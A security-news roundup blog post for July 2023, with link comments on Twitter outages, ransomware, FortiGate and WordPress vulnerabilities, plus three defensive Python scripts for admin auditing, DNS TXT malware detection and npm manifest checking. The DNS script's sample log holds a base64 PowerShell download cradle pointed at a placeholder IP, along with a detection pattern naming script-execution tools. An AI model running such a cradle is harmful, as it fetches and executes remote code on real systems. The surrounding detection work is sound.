This posting is here to collect cyber security news in July 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
183 Comments
Tomi Engdahl says:
Elon Musk Announces ‘Temporary’ Reading Limit On Twitter Amid Outage
https://www.forbes.com/sites/tylerroush/2023/07/01/elon-musk-announces-temporary-reading-limit-for-unverified-twitter-accounts-amid-outage/?utm_source=facebook&utm_medium=social&utm_campaign=forbes&utm_term=se-breaking&sh=184d8a6575fa
Elon Musk announced new “temporary” reading limits for Twitter accounts on Saturday, the latest change for the social media platform by Musk, as thousands of users were unable to access the site.
Tomi Engdahl says:
Twitter limits the number of tweets users can read amid extended outage
https://techcrunch.com/2023/07/01/twitter-imposes-limits-on-the-number-of-tweets-users-can-read-amid-extended-outage/
Twitter applies temporary reading limits amid ongoing problems with platform
Elon Musk has announced viewing limits for Twitter users due to ‘extreme’ data scraping
https://www.independent.co.uk/tech/elon-musk-is-twitter-down-b2367856.html#Echobox=1688235420
Tomi Engdahl says:
Elon Musk claims Twitter’s new login requirement is a ‘temporary’ response to data scrapers
A Twitter engineer said the change would be reversed “in the near future.”
https://www.engadget.com/elon-musk-claims-twitters-new-login-requirement-is-a-temporary-response-to-data-scrapers-160041528.html
Tomi Engdahl says:
Twitter temporarily restricts tweets users can see, Elon Musk announces
https://www.bbc.com/news/technology-66077195
Tomi Engdahl says:
Proxyjacking: The Latest Cybercriminal Side Hustle https://www.akamai.com/blog/security-research/proxyjacking-new-campaign-cybercriminal-side-hustle
The Akamai Security Intelligence Response Team (SIRT) has discovered a proxyjacking campaign that is targeting vulnerable SSH servers, then launching Docker services that share the victim’s bandwidth for money.
This campaign uses a compromised web server to distribute necessary dependencies, actively searches for and removes competing instances, and employs obfuscation techniques to evade detection.
Tomi Engdahl says:
Spyware app LetMeSpy hacked, tracked user data posted online https://www.malwarebytes.com/blog/news/2023/06/phone-monitoring-app-letmespy-hacked-victim-data-posted-online
Stalkerware-type app LetMeSpy says it has been hacked, with the attacker taking user data with it.
Tomi Engdahl says:
Malvertising Used as Entry Vector for BlackCat, Actors Also Leverage SpyBoy Terminator https://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html
Recently, the Trend Micro incident response team engaged with a targeted organization after having identified highly suspicious activities through the Targeted Attack Detection (TAD) service. In the investigation, malicious actors used malvertising to distribute a piece of malware via cloned webpages of legitimate organizations. In this case, the distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer.
Advertising platforms like Google Ads enable businesses to display advertisements to target audiences to boost traffic and increase sales.
Malware distributors abuse the same functionality in a technique known as malvertising, where chosen keywords are hijacked to display malicious ads that lure unsuspecting search engine users into downloading certain types of malware.
Tomi Engdahl says:
Beware: New ‘Rustbucket’ Malware Variant Targeting macOS Users https://thehackernews.com/2023/07/beware-new-rustbucket-malware-variant.html
Researchers have pulled back the curtain on an updated version of an Apple macOS malware called Rustbucket that comes with improved capabilities to establish persistence and avoid detection by security software
Tomi Engdahl says:
Hackers Exploiting Unpatched WordPress Plugin Flaw to Create Secret Admin Accounts https://thehackernews.com/2023/07/unpatched-wordpress-plugin-flaw-could.html
As many as 200,000 WordPress websites are at risk of ongoing attacks exploiting a critical unpatched security vulnerability in the Ultimate Member plugin.
The flaw, tracked as CVE-2023-3460 (CVSS score: 9.8), impacts all versions of the Ultimate Member plugin, including the latest version (2.6.6) that was released on June 29, 2023.
“This is a very serious issue: unauthenticated attackers may exploit this vulnerability to create new user accounts with administrative privileges, giving them the power to take complete control of affected sites,” WordPress security firm WPScan said in an alert.
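The WPScan alert quoted above points to the check a site owner should run regardless of whether a patched plugin version is available yet: list every account that currently holds the administrator role and compare it against the admins you actually expect. The script below is an added example for this thread, not code from The Hacker News, WPScan or the Ultimate Member project. It reads the JSON that wp-cli prints for `wp user list --fields=ID,user_login,user_email,user_registered,roles --format=json` and flags administrators that are either missing from an allowlist or were registered after the last time roles were reviewed. The site, logins, addresses and review date are constructed for the example.

```python
"""Audit WordPress accounts for administrators that should not exist.

Added example, not code from the article, WPScan or the Ultimate Member plugin.
Input is the JSON printed by:
  wp user list --fields=ID,user_login,user_email,user_registered,roles --format=json
Output is every account holding the administrator role that is not on the
allowlist of expected admins or was registered after the last role review.
"""
import json
from datetime import datetime, timezone

# Constructed wp-cli output: one legitimate admin, an editor, and two
# administrator accounts that appeared during the attack window.
SAMPLE_WP_USER_LIST = json.dumps([
    {"ID": 1, "user_login": "siteowner", "user_email": "owner@example.org",
     "user_registered": "2021-03-14 09:12:44", "roles": "administrator"},
    {"ID": 27, "user_login": "blogeditor", "user_email": "editor@example.org",
     "user_registered": "2022-01-05 16:40:02", "roles": "editor"},
    {"ID": 418, "user_login": "wpadmin", "user_email": "wp@mail.example",
     "user_registered": "2023-06-30 02:17:09", "roles": "administrator"},
    {"ID": 419, "user_login": "support_team", "user_email": "sup@example.net",
     "user_registered": "2023-07-01 11:05:51", "roles": "subscriber,administrator"},
])

# Assumed allowlist of admins the site owner knows about.
KNOWN_ADMINS = {"siteowner"}
# Assumed date of the last role review; anything registered later is suspect.
LAST_REVIEW = datetime(2023, 6, 1, tzinfo=timezone.utc)


def parse_wp_datetime(value):
    """wp-cli prints user_registered as 'YYYY-MM-DD HH:MM:SS' (WordPress stores it in UTC)."""
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


def admin_accounts(wp_json):
    """Yield users whose comma-separated roles field includes 'administrator'."""
    for user in json.loads(wp_json):
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        if "administrator" in roles:
            yield user


def find_suspect_admins(wp_json, known_admins, last_review):
    """Return (user_login, reason) pairs for administrators that need review."""
    findings = []
    for user in admin_accounts(wp_json):
        login = user["user_login"]
        registered = parse_wp_datetime(user["user_registered"])
        reasons = []
        if login not in known_admins:
            reasons.append("not in admin allowlist")
        if registered > last_review:
            reasons.append(f"registered {registered.date()} after last role review")
        if reasons:
            findings.append((login, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for login, reason in find_suspect_admins(SAMPLE_WP_USER_LIST, KNOWN_ADMINS, LAST_REVIEW):
        print(f"REVIEW {login}: {reason}")
```

On a live site, pipe the wp-cli output into `find_suspect_admins` in place of the constructed JSON. The allowlist comparison is the important half: it catches an injected administrator whatever plugin or bug created it, while the registration-date check only narrows the window you have to look at.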
Tomi Engdahl says:
Elon Musk sets new daily Twitter limits for users https://www.washingtonpost.com/technology/2023/07/01/elon-musk-new-twitter-user-limits/
Elon Musk announced Saturday that Twitter will temporarily limit the number of tweets users can read per day — with separate limits for paid and unpaid users — to combat computer programs that comb through posts to extract useful data from the platform.
It’s unclear how long the limits will last, and what lifting them will depend on. Musk did not respond to a request for comment.
Under the new limits, verified accounts will be limited to reading 6,000 posts per day while unverified accounts will have access to 600 per day, Musk tweeted. New unverified users, who join the platform after Saturday’s announcement, can only access 300 posts per day.
Tomi Engdahl says:
MEPs prepare to battle on spyware exemption in EU media law https://www.euractiv.com/section/media/news/meps-prepare-to-battle-on-spyware-exemption-in-eu-media-law/
As the Media Freedom Act moves on in the European Parliament, the real elephant in the room has become a provision introduced in the EU Council’s version that would allow authorities to spy on journalists for national security reasons.
Tomi Engdahl says:
Several US states investigating ‘SiegedSec’ hacking campaign https://therecord.media/states-investigate-siegedsec-hacking-campaign
Officials in multiple states are investigating claims by a suspected politically motivated hacking group that websites connected to local governments were breached or defaced.
This week, the SiegedSec group took to Telegram to claim cyberattacks on five state-run websites:
Nebraska Supreme Court intranet, South Dakota Boards and Commissions, Texas State BHEC Personal Information, Pennsylvania Provider Self-Service, South Carolina Criminal Justice Information Services (CJIS)
The group shared photos of the websites being defaced, as well as allegedly stolen data. No motive for the attacks was listed in the post but in previous attacks on government bodies in Texas, Kentucky and Arkansas, the group explicitly referenced political issues that prompted their attacks
Tomi Engdahl says:
MITRE Unveils Top 25 Most Dangerous Software Weaknesses of 2023: Are You at Risk?
https://thehackernews.com/2023/06/mitre-unveils-top-25-most-dangerous.html
MITRE has released its annual list of the Top 25 “most dangerous software weaknesses” for the year 2023.
“These weaknesses lead to serious vulnerabilities in software,” the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said. “An attacker can often exploit these vulnerabilities to take control of an affected system, steal data, or prevent applications from working.”
The list is based on an analysis of public vulnerability data in the National Vulnerability Database (NVD) for root cause mappings to CWE weaknesses for the previous two years. A total of 43,996 CVE entries were examined and a score was attached to each of them based on prevalence and severity.
Tomi Engdahl says:
Iranian Hackers Using POWERSTAR Backdoor in Targeted Espionage Attacks https://thehackernews.com/2023/06/iranian-hackers-charming-kitten-utilize.html
Charming Kitten, the nation-state actor affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), has been attributed to a bespoke spear-phishing campaign that delivers an updated version of a fully-featured PowerShell backdoor called POWERSTAR.
“There have been improved operational security measures placed in the malware to make it more difficult to analyze and collect intelligence,” Volexity researchers Ankur Saini and Charlie Gardner said in a report published this week.
Tomi Engdahl says:
CVE-2023-27997 Is Exploitable, and 69% of FortiGate Firewalls Are Vulnerable https://bishopfox.com/blog/cve-2023-27997-exploitable-and-fortigate-firewalls-vulnerable
Bishop Fox internally developed an exploit for CVE-2023-27997, a heap overflow in FortiOS—the OS behind FortiGate firewalls—that allows remote code execution. There are 490,000 affected SSL VPN interfaces exposed on the internet, and roughly 69% of them are currently unpatched. You should patch yours now.
Tomi Engdahl says:
Andy Baio / Waxy.org:
A developer says Twitter appears to be DDoSing itself via a Twitter web app JavaScript bug, which could be tied to Elon Musk’s emergency blocks and rate limits — For the last two days, Elon Musk has claimed that Twitter is under attack from “several hundred organizations” who were conducting …
Twitter bug causes self-DDOS tied to Elon Musk’s emergency blocks and rate limits: “It’s amateur hour”
https://waxy.org/2023/07/twitter-bug-causes-self-ddos-possibly-causing-elon-musks-emergency-blocks-and-rate-limits-its-amateur-hour/
For the last two days, Elon Musk has claimed that Twitter is under attack from “several hundred organizations” who were conducting “EXTREME levels of data scraping,” forcing them to bring “large numbers of servers online on an emergency basis” and enact emergency measures.
Yesterday, Twitter started blocking all logged-out access to Twitter, requiring signing in to view any tweet or profile. Elon Musk called it a “temporary emergency measure,” claiming they “were getting data pillaged so much that it was degrading service for normal users!”
Apparently, it didn’t stop the crush of traffic and, this morning, Musk announced they escalated their actions against supposed “extreme levels of data scraping” by rate-limiting the number of tweets you can view.
Immediately, Twitter users started seeing “Rate Limit Exceeded” messages and every trending topic was about the collapse of Twitter:
Are shadowy AI companies scraping Twitter for training data? Maybe!
But on Mastodon this morning, web developer Sheldon Chang noticed another source of unusual traffic: a bug in Twitter’s web app that is constantly sending requests to Twitter in an infinite loop:
This is hilarious. It appears that Twitter is DDOSing itself.
The Twitter home feed’s been down for most of this morning. Even though nothing loads, the Twitter website never stops trying and trying.
In the first video, notice the error message that I’m being rate limited. Then notice the jiggling scrollbar on the right.
The second video shows why it’s jiggling. Twitter is firing off about 10 requests a second to itself to try and fetch content that never arrives because Elon’s latest genius innovation is to block people from being able to read Twitter without logging in.
This likely created some hellish conditions that the engineers never envisioned and so we get this comedy of errors resulting in the most epic of self-owns, the self-DDOS.
Unbelievable. It’s amateur hour.
Manish Singh / TechCrunch:
Elon Musk says Twitter has temporarily limited verified accounts to reading 10K posts/day, unverified 1K, and new unverified 500, due to “extreme” data scraping — Twitter is putting limits to how many tweets its users can read as the Elon Musk-owned service suffers extended outage …
Twitter limits the number of tweets users can read amid extended outage
https://techcrunch.com/2023/07/01/twitter-imposes-limits-on-the-number-of-tweets-users-can-read-amid-extended-outage/
Tomi Engdahl says:
Matt Binder / Mashable:
Elon Musk claims the Twitter login requirement is a “temporary emergency measure” as “several hundred organizations” were scraping data “extremely aggressively”
https://mashable.com/article/elon-musk-twitter-login-requirement-temporary
Tomi Engdahl says:
https://thehackernews.com/2023/07/blackcat-operators-distributing.html
“Threat actors associated with the BlackCat ransomware have been observed employing malvertising tricks to distribute rogue installers of the WinSCP file transfer application.”
Tomi Engdahl says:
DNS TXT Records Can Be Used by Hackers to Execute Malware
https://cybersecuritynews.com/dns-txt-records-to-execute-malware/
ASEC from AhnLab has confirmed the use of DNS TXT Records in malware execution, which is a rare technique that holds importance for detection and analysis purposes.
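The technique in the comment above, a stage of the malware fetched from a DNS TXT answer, is worth a detection. TXT traffic is noisy (SPF, DKIM, DMARC and domain-verification records are all TXT), so a useful rule has to tolerate those while catching an answer that decodes to a command. The script below is an added example for this thread, not code from ASEC/AhnLab or the article. It scans a constructed DNS answer log (one response per line: time, client, query name, query type, quoted answer) and flags TXT answers that contain command-execution markers in the clear or after base64 decoding, or that are long base64 or high-entropy blobs outside the allowlisted record types. The log format, host names and payload are constructed for the example.

```python
"""Flag DNS TXT answers that look like staged commands rather than records.

Added example, not code from ASEC/AhnLab or the article. The log format is a
constructed one-line-per-response format; adapt LOG_RE to your resolver's logs.
"""
import base64
import binascii
import math
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>\S+)\s+(?P<qtype>\S+)\s+"(?P<answer>.*)"$'
)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MARKER_RE = re.compile(
    r"\b(powershell|iex|invoke-expression|frombase64string|cmd\.exe|wscript|rundll32|mshta)\b"
)
# Common legitimate TXT record prefixes. They only suppress the blob heuristics;
# the marker search still runs on them.
LEGIT_PREFIXES = ("v=spf1", "v=DKIM1", "v=DMARC1", "google-site-verification=", "MS=")

# Constructed payload: a base64-encoded PowerShell download cradle served as a TXT answer.
STAGER = base64.b64encode(
    b"powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
).decode()

# Constructed log: three ordinary TXT records, one A record, one staged command.
SAMPLE_LOG = "\n".join([
    '2023-07-02T10:14:03Z 10.0.0.23 example.org TXT "v=spf1 include:_spf.example.net -all"',
    '2023-07-02T10:14:09Z 10.0.0.23 sel1._domainkey.example.org TXT "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC7xyz"',
    '2023-07-02T10:15:41Z 10.0.0.23 example.org TXT "google-site-verification=rXOxyZounnZasA8Z7oaD3c14JdjS9aKSWvsR1EbUSIQ"',
    '2023-07-02T10:16:12Z 10.0.0.23 www.example.org A "93.184.216.34"',
    f'2023-07-02T10:16:55Z 10.0.0.48 cdn-update.example-bad.test TXT "{STAGER}"',
])


def shannon_entropy(text):
    """Bits per character; base64 blobs sit near 6, English text near 4."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def try_base64(text):
    """Return the decoded string if text is strict base64 of printable text, else None."""
    if len(text) % 4 or not B64_RE.match(text):
        return None
    try:
        decoded = base64.b64decode(text, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    if not all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
        return None
    return decoded


def analyze_txt_answer(answer):
    """Return the list of reasons this TXT answer is suspicious (empty if none)."""
    reasons = []
    decoded = try_base64(answer)
    in_clear = set(MARKER_RE.findall(answer.lower()))
    reasons += [f"contains '{m}'" for m in sorted(in_clear)]
    if decoded is not None:
        hidden = set(MARKER_RE.findall(decoded.lower())) - in_clear
        reasons += [f"contains '{m}' after base64 decode" for m in sorted(hidden)]
    if not answer.startswith(LEGIT_PREFIXES):
        if decoded is not None and len(answer) >= 64:
            reasons.append("long base64 payload")
        elif len(answer) >= 128 and shannon_entropy(answer) > 4.5:
            reasons.append("long high-entropy text")
    return reasons


def scan_dns_log(lines):
    """Parse log lines and return a record for every suspicious TXT answer."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m.group("qtype") != "TXT":
            continue
        reasons = analyze_txt_answer(m.group("answer"))
        if reasons:
            hits.append({"time": m.group("ts"), "client": m.group("client"),
                         "qname": m.group("qname"), "answer": m.group("answer"),
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_LOG.splitlines()):
        print(f"{hit['time']} {hit['client']} {hit['qname']}: {', '.join(hit['reasons'])}")
```

The allowlist is deliberately applied only to the size and entropy heuristics: an attacker can prefix a payload with `v=spf1`, so the marker search has to run on every answer. Conversely, a stager that is XOR-obfuscated rather than base64-encoded will only trip the entropy rule, which is why the rule reports the query name and client so the analyst can pivot to the host that asked.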
Tomi Engdahl says:
The UK government wants to undermine end-to-end encryption – Apple takes to the barricades https://www.tivi.fi/uutiset/tv/a11cd206-7891-4005-9dcc-00c661b40c4a
According to the BBC, Apple has joined 80 organisations and technology experts who are calling on UK technology minister Chloe Smith to reconsider the bill. Apple stresses that the law should protect privacy, while the British government stresses the platforms’ duty to combat child sexual abuse.
Tomi Engdahl says:
Dublin Airport staff pay details stolen by hackers after MOVEit attack at third-party provider https://www.bitdefender.com/blog/hotforsecurity/dublin-airport-staff-pay-details-stolen-by-hackers-after-moveit-attack-at-third-party-provider/
Staff at Dublin Airport have been warned that their personal data has fallen into the hands of hackers, following a data breach at a third-party service provider.
Some 2000 employees of DAA, the operator of Dublin airport, have had their pay and benefit details stolen after cybercriminals exploited a vulnerability in the MOVEit – a file-transfer tool used by many businesses to transfer files.
Tomi Engdahl says:
Decryptor publicly released for Akira ransomware used in several high-profile incidents https://therecord.media/decryptor-released-for-akira-ransomware-avast
A cybersecurity firm released a decryptor for the Akira ransomware, providing a way forward for dozens of victims that have dealt with attacks since the gang emerged in March 2023.
Several experts told Recorded Future News that a decryptor for the ransomware had been used quietly among incident responders for months before cybersecurity firm Avast developed and released its version for public download.
Tomi Engdahl says:
Apple, Civil Liberty Groups Condemn UK Online Safety Bill
https://www.securityweek.com/apple-civil-liberty-groups-condemn-uk-online-safety-bill/
Fears mount that UK Online Safety Bill may include a requirement for an encrypted message scanning capability.
The latest variant of the crypto wars is happening now, with the UK and EU governments attempting to force backdoors into end-to-end encryption (E2EE).
The war is law enforcement and government desire to prevent criminals ‘going dark’ through E2EE. The battlefield for liberal democracies is the EU (the Child Sexual Abuse Regulation) and the UK (the Online Safety Bill – OSB). The collateral damage could be every law abiding citizen – and the audience is all other liberal democracies around the world.
On June 26, 2023, the Online Rights Group delivered an open letter (PDF) signed by 80 technologists and civil rights organizations to Chloe Smith, the UK government minister guiding the OSB through parliament. The biggest concern is the likely requirement for an encrypted message scanning capability. The open letter warns:
“The scanning software would have to be pre-installed on people’s phones, without their permission or full awareness of the severe privacy and security implications. The underlying databases can be corrupted by hostile actors, meaning that individual phones would become vulnerable to attack. The breadth of the measures proposed in the Online Safety Bill – which would infringe the rights to privacy to the same extent for the internet’s majority of legitimate law-abiding users as it would for potential criminals…”
Tomi Engdahl says:
Malicious extensions in the Chrome Web Store https://www.kaspersky.com/blog/dangerous-chrome-extensions-87-million/48562/
Not so long ago, a few dozen malicious plugins were discovered in the Chrome Web Store (the official browser extension store for Google Chrome). The most popular of these extensions had over nine million downloads, and altogether these plugins had been downloaded around 87 million times.
Tomi Engdahl says:
DDoSia Attack Tool Evolves with Encryption, Targeting Multiple Sectors https://thehackernews.com/2023/07/ddosia-attack-tool-evolves-with.html
The threat actors behind the DDoSia attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down.
The updated variant, written in Golang, “implements an additional security mechanism to conceal the list of targets, which is transmitted from the [command-and-control] to the users,” cybersecurity company Sekoia said in a technical write-up.
Tomi Engdahl says:
Google Analytics data transfer to U.S. brings $1 million fine to Swedish firms https://www.bleepingcomputer.com/news/security/google-analytics-data-transfer-to-us-brings-1-million-fine-to-swedish-firms/
The Swedish Authority for Privacy Protection (Integritetsskyddsmyndigheten – IMY) has fined two companies 12.3 million SEK (€1 million/$1.1 million) for using Google Analytics and warned two others about the same practice.
In a decision published yesterday, the agency explains that by using Google Analytics to generate web statistics the firms were breaching European Union’s General Data Protection Regulation (GDPR).
Specifically, the companies were in violation of the GDPR Article 46(1), which forbids the transfer of personal data to countries or international organizations that lack safeguards that warrant safety and legal remediation mechanisms.
Tomi Engdahl says:
New Python tool checks NPM packages for manifest confusion issues https://www.bleepingcomputer.com/news/security/new-python-tool-checks-npm-packages-for-manifest-confusion-issues/
A security researcher and system administrator has developed a tool that can help users check for manifest mismatches in packages from the NPM JavaScript software registry.
Last week, a former engineering manager at GitHub and NPM, Darcy Clarke, warned about “manifest confusion” problems that could introduce the risk of malware hiding in dependencies or executing scripts during installation.
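The “manifest confusion” described above comes down to two documents that nothing forces to agree: the manifest the registry serves for a version, which tooling uses to resolve dependencies, and the package.json inside the published tarball, which is what actually ends up on disk and drives install scripts. A checker therefore only has to fetch both and diff the fields that change what gets installed or executed. The script below is an added example for this thread, not the tool the article describes and not code from npm or GitHub. It builds a constructed npm-style tarball in memory, reads its package.json, and reports field-by-field differences against a constructed registry manifest; the package name and its contents are hypothetical.

```python
"""Detect npm "manifest confusion": registry manifest vs. tarball package.json.

Added example, not the tool from the article or code from npm/GitHub.
Both inputs here are constructed; see the usage note for where the real ones
come from.
"""
import io
import json
import tarfile

# Fields where a mismatch changes what gets installed or what runs at install time.
COMPARED_FIELDS = ("name", "version", "dependencies", "optionalDependencies",
                   "peerDependencies", "bundleDependencies", "bin", "scripts")

# Constructed: what the registry reports for hypothetical-pkg@1.2.0.
REGISTRY_MANIFEST = {
    "name": "hypothetical-pkg", "version": "1.2.0",
    "dependencies": {"ms": "^2.1.3"},
    "scripts": {"test": "node test.js"},
}

# Constructed: the package.json actually inside the tarball adds an extra
# dependency and a postinstall hook that the registry manifest does not show.
TARBALL_PACKAGE_JSON = {
    "name": "hypothetical-pkg", "version": "1.2.0",
    "dependencies": {"ms": "^2.1.3", "hypothetical-helper": "1.0.0"},
    "scripts": {"test": "node test.js", "postinstall": "node setup.js"},
}


def build_tarball(package_json):
    """Create a minimal npm-style .tgz (files under package/) in memory."""
    data = json.dumps(package_json, indent=2).encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("package/package.json")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def read_tarball_manifest(tgz_bytes):
    """Return the depth-one package.json from an npm tarball.

    npm pack puts files under package/, but other publishing tools have used
    other directory names, so accept any <dir>/package.json at depth one.
    """
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            parts = member.name.split("/")
            if len(parts) == 2 and parts[1] == "package.json" and member.isfile():
                return json.load(tar.extractfile(member))
    raise ValueError("no package.json at depth one in tarball")


def diff_field(registry_value, tarball_value):
    """Per-key differences for object fields, whole-value difference otherwise."""
    if isinstance(registry_value, dict) or isinstance(tarball_value, dict):
        a, b = registry_value or {}, tarball_value or {}
        return {k: {"registry": a.get(k), "tarball": b.get(k)}
                for k in sorted(set(a) | set(b)) if a.get(k) != b.get(k)}
    return {"registry": registry_value, "tarball": tarball_value}


def compare_manifests(registry_manifest, tarball_manifest):
    """Map each mismatched field to its differences; an empty dict means consistent."""
    diffs = {}
    for field in COMPARED_FIELDS:
        a, b = registry_manifest.get(field), tarball_manifest.get(field)
        if a != b:
            diffs[field] = diff_field(a, b)
    return diffs


if __name__ == "__main__":
    tgz = build_tarball(TARBALL_PACKAGE_JSON)
    for field, detail in compare_manifests(REGISTRY_MANIFEST, read_tarball_manifest(tgz)).items():
        print(f"MISMATCH {field}: {json.dumps(detail)}")
```

Against the real registry you would fetch `https://registry.npmjs.org/<name>/<version>` as the registry manifest and download the URL in its `dist.tarball` field as the tarball, then call `compare_manifests` on the two. A `scripts` entry such as `postinstall` that exists only in the tarball is exactly the case the article warns about: it runs at install time without ever appearing in the metadata most audit tooling reads.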
Tomi Engdahl says:
Firefox 115 Patches High-Severity Use-After-Free Vulnerabilities
https://www.securityweek.com/firefox-115-patches-high-severity-use-after-free-vulnerabilities/
Mozilla has released Firefox 115 to the stable channel with patches for two high-severity use-after-free vulnerabilities.
Mozilla on Tuesday announced the release of Firefox 115 to the stable channel with patches for a dozen vulnerabilities, including two high-severity use-after-free bugs.
Tracked as CVE-2023-37201, the first of the high-severity issues is described as a use-after-free flaw in WebRTC certificate generation.
An open source project, WebRTC enables real-time communication in web browsers and mobile applications, via application programming interfaces (APIs).
“An attacker could have triggered a use-after-free condition when creating a WebRTC connection over HTTPS,” Mozilla explains in an advisory.
The second high-severity vulnerability, CVE-2023-37202, is described as a potential use-after-free issue from compartment mismatch in the open source JavaScript and WebAssembly engine SpiderMonkey.
“Cross-compartment wrappers wrapping a scripted proxy could have caused objects from other compartments to be stored in the main compartment resulting in a use-after-free,” Mozilla says.
Mozilla Foundation Security Advisory 2023-22
Security Vulnerabilities fixed in Firefox 115
https://www.mozilla.org/en-US/security/advisories/mfsa2023-22/
Tomi Engdahl says:
You’ve patched right? ‘340K+ Fortinet firewalls’ wide open to critical security bug > https://go.theregister.com/feed/www.theregister.com/2023/07/03/338000_fortinet_firewalls_vulnerability/, 2023-07-03 23:17:07 +0000
Tomi Engdahl says:
Ransomware Criminals Are Dumping Kids’ Private Files Online After School Hacks https://www.securityweek.com/ransomware-criminals-are-dumping-kids-private-files-online-after-school-hacks/
The confidential documents stolen from schools and dumped online by ransomware gangs are raw, intimate and graphic. They describe student sexual assaults, psychiatric hospitalizations, abusive parents, truancy — even suicide attempts.
Complete sexual assault case folios containing these details were among more than 300,000 files dumped online in March after the 36,000-student Minneapolis Public Schools refused to pay a $1 million ransom. Other exposed data included medical records, discrimination complaints, Social Security numbers and contact information of district employees.
Tomi Engdahl says:
Researchers call for UK, EU to heed scientific evaluation of client-side scanning proposals https://therecord.media/encrypted-messaging-client-side-scanning-uk-eu-proposals
Scientists and researchers are criticizing both the United Kingdom’s and European Union’s proposals that could allow national authorities to mandate the use of client-side scanning technologies on encrypted messaging apps.
Experts from the U.K.’s National Research Centre on Privacy, Harm Reduction and Adversarial Influence Online (REPHRAIN) this week called on politicians in Britain “to consider independent scientific evaluation before voting through the online safety bill,” which is currently sitting with the U.K.’s House of Lords for scrutiny.
Their calls were echoed by more than 300 signatories to a joint statement sent to the European Council and Parliament warning that the EU’s proposed Child Sexual Abuse Regulation risks both failing to protect children and introducing new potential for harms.
Tomi Engdahl says:
Japan’s Nagoya Port Suspends Cargo Operations Following Ransomware Attack
Japan’s Port of Nagoya this week suspended cargo loading and unloading operations following a ransomware attack.
https://www.securityweek.com/japans-nagoya-port-suspends-cargo-operations-following-ransomware-attack/
Tomi Engdahl says:
Exploited Solar Power Product Vulnerability Could Expose Energy Organizations to Attacks
https://www.securityweek.com/exploited-solar-power-product-vulnerability-could-expose-energy-organizations-to-attacks/
An actively exploited vulnerability in the Contec SolarView solar power monitoring product can expose hundreds of energy organizations to attacks.
Hundreds of energy organizations could be exposed to attacks due to an actively exploited vulnerability affecting a solar power monitoring product made by Contec, vulnerability intelligence company VulnCheck warned on Wednesday.
Contec specializes in custom embedded computing, industrial automation, and IoT communication technology. The company’s SolarView solar power monitoring and visualization product is used at more than 30,000 power stations, according to its website.
Palo Alto Networks reported on June 22 that a Mirai variant has been exploiting a vulnerability in SolarView to hack devices and ensnare them into a botnet. The flaw, CVE-2022-29303, is one of the nearly two dozen targeted by the botnet.
CVE-2022-29303 is described as a code injection issue affecting SolarView version 6.0. The vulnerability can be exploited remotely by unauthenticated attackers.
VulnCheck’s analysis indicates that the security hole was only patched with the release of version 8.0 and versions dating back to at least 4.0 are impacted.
Tomi Engdahl says:
Jonathan Greig / The Record:
After Fortinet patched a major FortiOS bug on June 12, researchers find that ~336K out of ~490K affected SSL VPN interfaces are still unpatched and open to RCE
Nearly 70% of FortiGate Firewalls are vulnerable to new bug, experts say
https://therecord.media/fortigate-firewalls-vulnerable-to-new-bug
Cybersecurity experts are raising the alarm about a new vulnerability that leaves hundreds of thousands of Fortinet customers vulnerable to attack.
Concerns about the issue — tracked as CVE-2023-27997 — grew last month due to how widely used Fortinet’s SSL-VPN product is among government organizations. Fortinet released a patch in June for the bug, which has a “critical” severity score of 9.8 out of 10 and was discovered by Lexfo Security vulnerability researchers.
Fortinet said the issue “may have been exploited in a limited number of cases” and noted that the hacking campaign was “targeted at government, manufacturing, and critical infrastructure.”
Tomi Engdahl says:
Apps with 1.5M installs on Google Play send your data to China https://www.bleepingcomputer.com/news/security/apps-with-15m-installs-on-google-play-send-your-data-to-china/
Security researchers discovered two malicious file management applications on Google Play with a collective installation count of over 1.5 million that collected excessive user data that goes well beyond what’s needed to offer the promised functionality.
The apps, both from the same publisher, can launch without any interaction from the user to steal sensitive data and send it to servers in China.
Despite being reported to Google, the two apps continue to be available in Google Play at the time of publishing.
Tomi Engdahl says:
Welcome to New York: Exploring TA453′s Foray into LNKs and Mac Malware https://www.proofpoint.com/us/blog/threat-insight/welcome-new-york-exploring-ta453s-foray-lnks-and-mac-malware
In mid-May 2023, TA453—also known publicly as Charming Kitten, APT42, Mint Sandstorm, Yellow Garuda—sent a benign conversation lure masquerading as a senior fellow with the Royal United Services Institute (RUSI) to the public media contact for a nuclear security expert at a US-based think tank focused on foreign affairs. The email solicited feedback on a project called “Iran in the Global Security Context” and requested permission to send a draft for review. The initial email also mentioned participation from other well-known nuclear security experts TA453 has previously masqueraded as, in addition to offering an honorarium. TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho. When given the opportunity, TA453 ported its malware and attempted to launch an Apple flavored infection chain dubbed NokNok by Proofpoint. TA453 also employed multi-persona impersonation in its unending espionage quest.
Tomi Engdahl says:
Surviving the 800 Gbps Storm: Gain Insights from Gcore’s 2023 DDoS Attack Statistics https://thehackernews.com/2023/07/surviving-800-gbps-storm-gain-insights.html
